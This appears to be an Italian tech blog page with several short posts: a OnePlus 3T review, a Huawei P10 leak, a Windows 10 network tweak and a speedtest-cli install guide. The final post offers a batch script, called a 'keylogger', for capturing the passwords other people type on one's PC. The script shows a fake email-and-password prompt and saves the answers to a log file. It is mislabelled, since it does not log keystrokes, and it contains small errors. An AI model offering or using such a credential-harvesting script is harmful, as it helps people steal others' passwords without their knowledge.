DI TENDENZA

Tutorial

News, Tutorial, Tips&Tricks dal mondo della tecnologia.

OnePlus è conosciuta in tutto il mondo per i suoi terminali di fascia alta dal prezzo contenuto.
Sono passati ormai anni da quando l'azienda lanciò sul mercato il suo primo Smartphone, il OnePlus, lasciando tutti senza parole. A meno di sei mesi dal lancio del suo ultimo Smartphone, il Oneplus 3, l'azienda ritorna a far parlare di se, presentando il nuovo OnePlus 3T.
Il design del OnePlus 3T resta invariato rispetto a quello del OnePlus 3, ciò che cambia è la parte hardware, difatti il OnePlus 3T ha la nuova CPU Qualcomm Snapdragon 821, che grazie ai suoi consumi ridotti ed una batteria maggiorata, 3400mAh rispetto ai 3000mAh del OnePlus 3 ha permesso di ottimizzare l'autonomia del nuovo terminale di circa il 10%.
Altra novità è il nuovo sensore fotografico anteriore che passa da 8MP a 16MP, mentre per quello posteriore è stato aggiunto solo il nuovo rivestimento antigraffio in zaffiro, lasciano invariato il sensore da 16MP.  La restante parte hardware non è stata aggiornata, troviamo ancora un display AMOLED da 5,5" con risoluzione 1920x1080, 6GB di memoria RAM, la porta USB-C, il sensore di impronte digitali e la funzionalità dual-SIM. Questa volta saranno disponibili anche modelli con 128GB di memoria interna e nuove colorazioni, "canna di fucile" e "soft gold".

Il software

Il vero tallone di Achille di questo dispositivo è il software, ancora fermo ad Android 6.0 Marshmallow, per fortuna è stato già annunciato l'arrivo di Nougat su OnePlus 3T e OnePlus 3 entro la fine di Dicembre.

Conclusioni

Non è tutto oro ciò che luccica, tutte queste migliorie hardware hanno fatto lievitare leggermente il prezzo finale del prodotto, per acquistare il nuovo OnePlus 3T serviranno circa 439€, 40€ in più rispetto al OnePlus 3, se invece si sceglie la versione con 128GB di memoria interna il prezzo lieviterà di altre 40€ arrivando a 479€. Noi pensiamo che sia uno spreco acquistare il nuovo terminale se già si possiede il OnePlus 3, un'altra cosa che ci ha delusi è la scelta del display, ancora con risoluzione FHD.
News, Tutorial, Tips&Tricks dal mondo della tecnologia.
Da qualche settimana girano in rete foto del presunto Huawei P10. Ieri sul noto sito, Weibo, è stata pubblicata una foto "ufficiosa" del nuovo top di gamma di casa Huawei.

 
Il design ricorda molto l'attuale top di gamma P9, sul retro è ben visibile la doppia fotocamera sviluppata in collaborazione con Leica ed il sensore di impronte digitali. Con molta probabilità le caratteristiche hardware saranno le seguenti:
  • Display da 5,5 pollici QHD;
  • CPU Kirin 960;
  • Doppia fotocamera da 20 Megapixel;
  • Fotocamera frontale da 8 Megapixel;
  • 6 GB di RAM 
  • 256 GB di memoria interna.
Noi pensiamo che sarà lanciata sul mercato anche una versione Lite del terminale, con caratteristiche leggermente inferiori. Non ci resta che attendere il prossimo Mobile World Congress per scoprire se le informazioni trafugate siamo vere o meno!
News, Tutorial, Tips&Tricks dal mondo della tecnologia.

Nonostante sia passato molto tempo dal rilascio ufficiale di Windows 10, molte persone hanno deciso di non aggiornare e restare al buon vecchio Windows 7. Questo è successo perché il nuovo O.S. di casa Microsoft al rilascio ufficiale aveva non pochi bug; con l'arrivo del corposo aggiornamento, ovvero, l'Anniversary Update sono stati corretti molti bug e sono state aggiunte nuove funzioni, ora Windows 10 è davvero stabile e maturo. Ma non è tutto oro ciò che luccica, infatti molti utenti hanno riscontrato un problema nella velocità di connessione ad internet, il problema è causato da una funzionalità "Window Auto-Tuning" attiva di default su Windows. Per rendere più veloce la connessione bisogna disattivare tale funzionalità, vediamo come fare:

Disattivare Windows Auto Tuning

Apriamo il cmd--> Start--> digitare cmd--> clic su Prompt dei comandi
Nella finestra del cmd digitiamo il seguente comando: netsh interface tcp show global
Individuiamo la voce "Verificare la voce Livello di regolazione automatico finestra ricezione" se impostato su normal, è attiva.
Per disattivare Window Auto-Tuning digitiamo il seguente comando: netsh int tcp set global autotuninglevel=disabled


Fateci sapere se seguendo questa guida la vostra velocità di navigazione su Windows 10 aumenta!
News, Tutorial, Tips&Tricks dal mondo della tecnologia.

Speedtest.net, come molti di voi sicuramente sapranno, è un servizio che permette di verificare la velocità della nostra connessione ad internet. Non fa altro che collegarsi ad un dato server per controllare il tempo di ping, velocità in download e upload.




Ma non tutti trovano comodo usare questo servizio, vuoi per connessioni lente, vuoi per problemi con flash player. Speedtest-cli è il tool con interfaccia a linea di comando (CLI) che permette di testare la nostra larghezza di banda usando speedtest.net.

Installare speedtest-cli

Per installare questo tool, dovrete semplicemente aprire il terminale e incollare i seguenti comandi:

$ wget -O speedtest-cli https://raw.github.com/sivel/speedtest-cli/master/speedtest_cli.py
$ chmod +x speedtest-cli


Per altri metodi d’installazione consultare la relativa pagina su github

Test della velocità

Dopo aver installato il tool, per testare la velocità della nostra connessione, dovremo semplicemente scrivere tale comando: 
$ ./speedtest-cli
Dando questo comando speedtest-cli localizzerà automaticamente il server più vicino a te, mostrandone anche la distanza 


Inoltre dando il comando
$ speedtest-cli --share
Il terminale ci restituirà un link diretto allo snapshot da poter condividere.
News, Tutorial, Tips&Tricks dal mondo della tecnologia.

Quanti di voi si sono sempre chiesti se sia possibile impossessarsi delle password digitate da alcuni utenti sul proprio PC? La risposta è semplice, basta usare un Keylogger; in informatica un Keylogger è uno strumento hardware o software in grado di effettuare lo sniffing della tastiera di un computer, cioè è in grado di intercettare e catturare segretamente tutto ciò che viene digitato sulla tastiera senza che l'utente si accorga di essere monitorato. [Fonte Wikipedia]. Oggi vi mostreremo come creare un Keylogger utilizzando il Blocco note. 
Il tutto è davvero semplice, basta creare un nuovo documento di testo cliccando con il tasto desto del mouse sul Desktop Nuovo--> Documento di testo (vedi immagine) e copiare il seguente testo:



@echo off
color a
title Keylogger
cls
echo Please Enter Your Email Address And Password
echo.
echo.
set /p user=Username:
set /p pass=Password:
echo Username="%user%” Password=”%pass%" >> C:\Logs\Log.txt
pause
start >>Program Here<<
cd "C:Logs"
exit
Una volta copiato il testo dobbiamo salvare il tutto, ma attenzione, bisogna cambiare l'estensione del file da .txt a .bat (vedi foto), bisogna rinominare il file in: Logs.bat


Ora non ci resta che creare una cartella nella root principale del nostro hard disk, quindi rechiamoci in Risorse del computer--> disco locale C: e qui creiamo una nuova cartella rinominandola in "Logs", il nome della cartella deve obbligatoriamente essere Logs altrimenti il programma non funzionerà!

Il nostro Keylogger ora è pronto, possiamo avviare il fila Logs.bat, alla chiusura noteremo che il testo digitato sarà stato salvato automaticamente in un file di testo all'interno della cartella Logs.